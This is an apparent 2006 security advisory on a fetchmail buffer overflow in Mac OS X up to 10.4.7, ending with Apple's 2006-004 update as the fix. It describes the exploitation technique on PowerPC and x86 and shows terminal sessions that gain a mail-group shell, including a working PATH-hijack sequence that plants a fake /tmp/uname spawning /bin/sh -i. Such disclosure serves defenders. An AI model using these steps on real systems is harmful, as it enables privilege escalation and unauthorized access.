DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow' Author: Kevin Finisterre Vendor: Product: 'Mac OSX <=10.4.7' References:[2006-0801a].txt Description: fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs can cause fetchmail to crash, or potentially make it execute code placed on the stack. In some configurations, fetchmail is run by the root user to download mail for multiple accounts.'. The authors of fetchmail made patches for these issues available to the public on 2005-07-21. In defiance of a 'very proactive approach to security' Apple's OSX remained unpatched for approximately one year after the vendor supplied patches were made available. Shortly after the vendor disclosure of this bug exploits were made available by The Mantis Project ( Conicidentally a recent paper was written about exploiting buffer overflows and this vulnerability was used as an example: As you may have guessed by now exploitation on OSX is fairly trivial for both PowerPC and x86 platforms. An attacker with local access can gain gid=6 (mail) and a remote attacker may gain root under certain conditions. k-fs-computer:~ kf$ ls *pwnedmail* On PowerPc things were pretty straight forward. Simply overwriting the $pc and $lr registers with the address of our stack based shellcode was enough to snag egid=6. On x86 we obviously have to deal with the NX based protection. As shown plenty of times in the past a non executable stack by itself is pretty useless. We can overwrite the $eip register with the address of system() and we are pretty much good to go. A small wrapper in /tmp can help finish the job and give us a shell with gid=6. k-fs-computer:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234 Enter password for kfinisterre@localhost: sh-2.05b$ id uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin) In some cases fetchmail is run by the root user so it may be possible to take remote root with this vulnerability under certain circumstances. As a side note a previously undisclosed local vulnerability in fetchmail was discovered while documenting the above mentioned issue. Fetchmail no longer ships in a setgid() configuration so this information should be of minimal impact. It is worth noting since it may impact non OSX machines in a similar manor. k-fs-computer:~ kf$ export PATH=/tmp/:$PATH k-fs-computer:~ kf$ cat > /tmp/uname /usr/bin/id /bin/sh -i k-fs-computer:~ kf$ chmod +x /tmp/uname k-fs-computer:~ kf$ /usr/bin/fetchmail -V This is fetchmail release 6.2.5+IMAP-GSS+SSL+INET6 Fallback MDA: (none) uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin) sh-2.05b$ This issue is caused by the following code snippet: if (versioninfo) { ... /* this is an attempt to help remote debugging */ system("uname -a"); } Both of the above problems are addressed by the latest Apple update. Work Around: Install the 2006-004 update